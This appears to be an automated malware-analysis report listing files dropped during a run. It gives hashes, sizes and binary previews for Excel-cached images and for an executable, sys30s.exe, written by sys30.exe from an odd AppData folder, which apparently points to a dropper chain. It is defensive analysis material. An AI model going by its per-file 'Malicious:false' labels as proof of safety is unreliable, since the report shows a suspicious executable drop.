                                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0FB241A.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                  Category:dropped
                                  Size (bytes):49744
                                  Entropy (8bit):7.99056926749243
                                  Encrypted:true
                                  SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                  MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                  SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                  SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                  SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C533050B.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):6815
                                  Entropy (8bit):7.871668067811304
                                  Encrypted:false
                                  SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                  MD5:E2267BEF7933F02C009EAEFC464EB83D
                                  SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                  SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                  SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CD10F035.jpeg
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                  Category:dropped
                                  Size (bytes):14198
                                  Entropy (8bit):7.916688725116637
                                  Encrypted:false
                                  SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                  MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                  SHA1:72CA86D260330FC32246D28349C07933E427065D
                                  SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                  SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D159201E.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):84203
                                  Entropy (8bit):7.979766688932294
                                  Encrypted:false
                                  SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                  MD5:208FD40D2F72D9AED77A86A44782E9E2
                                  SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                  SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                  SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5ACA390.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):33795
                                  Entropy (8bit):7.909466841535462
                                  Encrypted:false
                                  SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                  MD5:613C306C3CC7C3367595D71BEECD5DE4
                                  SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                  SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                  SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D7CE92C.jpeg
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                  Category:dropped
                                  Size (bytes):8815
                                  Entropy (8bit):7.944898651451431
                                  Encrypted:false
                                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                  MD5:F06432656347B7042C803FE58F4043E1
                                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E28D9338.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):33795
                                  Entropy (8bit):7.909466841535462
                                  Encrypted:false
                                  SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                  MD5:613C306C3CC7C3367595D71BEECD5DE4
                                  SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                  SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                  SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E63617.jpeg
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                  Category:dropped
                                  Size (bytes):85020
                                  Entropy (8bit):7.2472785111025875
                                  Encrypted:false
                                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FAFF2EEE.emf
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                  Category:dropped
                                  Size (bytes):7788
                                  Entropy (8bit):5.524903199797432
                                  Encrypted:false
                                  SSDEEP:96:w2CHOvlJaX1/0qMfZoL/GuoOfaDda/ZbjsSZdb3Cim3n+KeXI:wuTrZuloOSGZboS/C93n+KuI
                                  MD5:36605E4B4C07FDB5E0D5AB38D34D867C
                                  SHA1:34E0F81DD7F7AA05EBC4C7BD124057242D48995A
                                  SHA-256:67E8E1A18EDD19C46C49819B16A81C208321D1A04C280EBA39A785F6B011742D
                                  SHA-512:271F3A3EFE72DADF28AEAF8F29C6547AE13CE6086D27C94B2F755BF3E8B2F5B00F9D8D6112C1D07277DD9A38E7B899D63628932EA8CA1A0F0D4F2AD80BB18FA6
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: ....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.......d.............................p....\...............\.....p........<5.u..p....`.p09..$y.w...................w....$.....Z.d............^.p.....^.p........o......-...D....<.w................<.9u.Z.v....X.n....09.........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD>^JHCcNJFfNJFiPMHlRPJoTPLrWQLvYRPxZUR{]XP~]WS.^ZS.`[T.c\U.e^U.e]W.g`Y.hbY.j`Y.ib\.ld].kd].nd^.nf^.
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso5360.tmp
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                  Category:dropped
                                  Size (bytes):1254
                                  Entropy (8bit):5.835900066445133
                                  Encrypted:false
                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                  MD5:A3C62E516777C15BF216F12143693C61
                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso5361.tmp
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                  Category:dropped
                                  Size (bytes):1254
                                  Entropy (8bit):5.835900066445133
                                  Encrypted:false
                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                  MD5:A3C62E516777C15BF216F12143693C61
                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso5391.tmp
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                  Category:dropped
                                  Size (bytes):1254
                                  Entropy (8bit):5.835900066445133
                                  Encrypted:false
                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                  MD5:A3C62E516777C15BF216F12143693C61
                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF90E.tmp
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                  Category:dropped
                                  Size (bytes):1254
                                  Entropy (8bit):5.835900066445133
                                  Encrypted:false
                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                  MD5:A3C62E516777C15BF216F12143693C61
                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF90F.tmp
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                  Category:dropped
                                  Size (bytes):1254
                                  Entropy (8bit):5.835900066445133
                                  Encrypted:false
                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                  MD5:A3C62E516777C15BF216F12143693C61
                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF93F.tmp
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                  Category:dropped
                                  Size (bytes):1254
                                  Entropy (8bit):5.835900066445133
                                  Encrypted:false
                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                  MD5:A3C62E516777C15BF216F12143693C61
                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                  C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  Process:C:\Users\user\AppData\Local\sys4h57g\sys30.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):78336
                                  Entropy (8bit):4.369296705546591
                                  Encrypted:false
                                  SSDEEP:768:jlU4+MS3Fu0thSOV4GM0SuHk9Oh/1TRIWUk7NlfaNV9KQLxXXSv:l6o03IGMLuHk+Ck5lfaNP7xSv
                                  MD5:0E362E7005823D0BEC3719B902ED6D62
                                  SHA1:590D860B909804349E0CDC2F1662B37BD62F7463
                                  SHA-256:2D0DC6216F613AC7551A7E70A798C22AEE8EB9819428B1357E2B8C73BEF905AD
